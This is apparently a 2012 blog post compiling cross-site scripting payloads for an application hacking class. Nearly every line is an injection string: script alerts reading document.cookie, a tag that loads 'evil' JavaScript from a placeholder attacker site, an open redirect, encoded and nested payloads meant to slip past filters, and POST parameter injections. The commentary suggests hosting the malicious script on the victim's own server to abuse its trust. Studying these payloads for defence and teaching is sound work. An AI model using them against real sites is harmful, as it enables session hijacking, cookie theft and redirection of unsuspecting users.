These were compiled in September of 2012 – if you are reading this way off in the future – you will want to go back and verify that these still work.
So what types of testing can you do for Cross Site Scripting? This is a quick collection of standard Cross Site Scripting Notation from around the internet, security blogs, security sites, and some of the more interesting underground web sites out there. These are just examples of the code that you can use to do cross site scripting.
<script>alert(document.cookie);</script> this will steal someone else’s cookie or otherwise access a cookie that you might not otherwise have access to.
<SCRIPT SRC=http://YourWebSite.com/YourEvilJavaScript.js></SCRIPT> this will inject your java script from a site you own, control, or from a java script you have successfully put on the web server you are cross site scripting. It is best to use their server for your evil script to take advantage of systems trust. Your computer might not be trusted, and that would throw some interesting errors that the client might see.
<BODY BACKGROUND=”javascript:alert(‘XSS’)”> using the body background tag to inject a script into your vulnerable system.
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME> using an IFRAME as an injection possibility
<body onload=alert(‘test’)> loads the XSS using the body onload command
<IMG SRC=jAvascript:alert(‘test’)> using an IMG tag to alert when the image loads
<script>alert(‘Xss By Your Name here’)</script> using a standard java script alert notation
SomePage.php?url=http://EvilHackerSite.com simple redirect to a page of your choice
</script><script>alert%28document.cookie%29</script><script> nested script tags for evasion if you think the site you are looking at is protected by a Firewall or other security system
%22%3E%3Cscript%3Ealert%28%22http://st2tea.blogspot.com%22%29%3C/script%3E using UTF8 or other encoding for evasion processes.
POST: retURL=http%3A%2F%2Fwww.xssed.com%2F using the post command to redirect to a different URL than intended
POST: keywords=%22%2F%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&search.x=0&search.y=0 using post to subvert the internal site search engine (all sites have a search feature unless they are horribly out of date)
There are a lot of places out there that have a lot of very good examples. These were pulled from XSSED.com and Hackers.org and CGI-Security. These are being used in my Application Hacking class at Highline Community College, in a private network, with known vulnerable software. No system was compromised in the pursuit of this knowledge. Please don’t try this at home.
Related articles
